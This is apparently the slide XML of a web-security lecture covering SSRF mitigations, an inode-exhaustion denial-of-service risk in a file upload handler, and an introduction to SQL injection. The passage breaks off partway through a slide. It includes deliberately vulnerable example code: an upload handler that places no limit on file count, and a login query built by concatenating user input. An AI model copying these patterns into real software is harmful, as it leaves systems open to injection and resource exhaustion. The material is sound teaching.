              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>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242"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233225" y="38875"/>
            <a:ext cx="72912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Mitigating the Likelihood of SSRF Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1727" name="Google Shape;1727;p242"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="728400"/>
            <a:ext cx="8285400" cy="39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Avoid accepting full URIs from untrusted inputs/users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:endParaRPr sz="800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Use an “SSRF resistant” library (e.g. Python-&gt;Advocate)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>“SSRF resistant” =&gt; prevent DNS rebinding and disallow requests to private IP addresses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Don’t build support for unneeded protocols in software</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. curl by-default supports file://, http://, https://, ftp://, scp://</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Disable unnecessary protocols via library configuration</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>imagemagick SVG has support for making HTTP requests</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Default-to-deny the web server’s network connections</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Principle of least privilege: does the service need to create connections to arbitrary servers? If not, do not grant those permissions!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Helps with “accidental” SSRF support from feature-dense dependencies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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1732" name="Google Shape;1732;p243"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973375" y="2749150"/>
            <a:ext cx="2109300" cy="8700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1733" name="Google Shape;1733;p243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-423419">
            <a:off x="5973010" y="1694429"/>
            <a:ext cx="2256293" cy="10891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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Hacks</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Permanent Marker"/>
              <a:ea typeface="Permanent Marker"/>
              <a:cs typeface="Permanent Marker"/>
              <a:sym typeface="Permanent Marke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44"/>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Denial of Service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1739" name="Google Shape;1739;p244"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3421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What are some possible concerns with this code?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1740" name="Google Shape;1740;p244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157400" y="1778000"/>
            <a:ext cx="6829200" cy="29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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def file_upload_handler(user_file):</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   file_name = random_file_name()</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   file_path = “/tmp/%s” % file_name</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># check file size limit</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   if user_file.size &gt; FILE_SIZE_LIMIT:</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      raise Exception(‘file too large’)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   file = open(file_path, ‘w’)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   file.write(user_file.data)</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   return ‘ok’</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym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245"/>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Denial of Service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1746" name="Google Shape;1746;p245"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="3421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What are some possible concerns with this code?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>This limits file size, but does not limit the number of files created. An attacker could upload thousands of small files to exhaust inodes. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Linux inodes limits could be around 1 million inodes total.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>1 million, 1 byte files = 1MB</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="Google Shape;1747;p245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493650" y="2625725"/>
            <a:ext cx="6342900" cy="21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New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def file_upload_handler(user_file):</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file_name = random_file_name()</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file_path = “/tmp/%s” % file_name</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="6BBF4E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># check file size limit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6BBF4E"/>
              </a:solidFill>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if user_file.size &gt; FILE_SIZE_LIMIT:</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raise Exception(‘file too large’)</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file = open(file_path, ‘w’)</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file.write(user_file.data)</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return ‘ok’</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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246"/>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Injection (SQLi)</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247"/>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What’s a SQL?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1758" name="Google Shape;1758;p247"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="37095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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tructured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>uery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>anguage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many types (MySQL, MSSQL, Postgres, NoSQL, etc)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They all look something like this:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1759" name="Google Shape;1759;p247"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500075" y="2243050"/>
            <a:ext cx="8143851" cy="4955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248"/>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SQLi Work?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1765" name="Google Shape;1765;p248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030675" y="1695475"/>
            <a:ext cx="5940300" cy="150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800">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>query = “SELECT * FROM users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>WHERE email = \’” + email + “\’ AND password = \’” + password + “\’;”</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1766" name="Google Shape;1766;p248"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505499" y="1267478"/>
            <a:ext cx="1666422" cy="2701824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1767" name="Google Shape;1767;p248"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1765" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="2183325" y="1600525"/>
            <a:ext cx="1027800" cy="666900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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249"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421700" y="323575"/>
            <a:ext cx="7947300" cy="79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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>SELECT * FROM users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
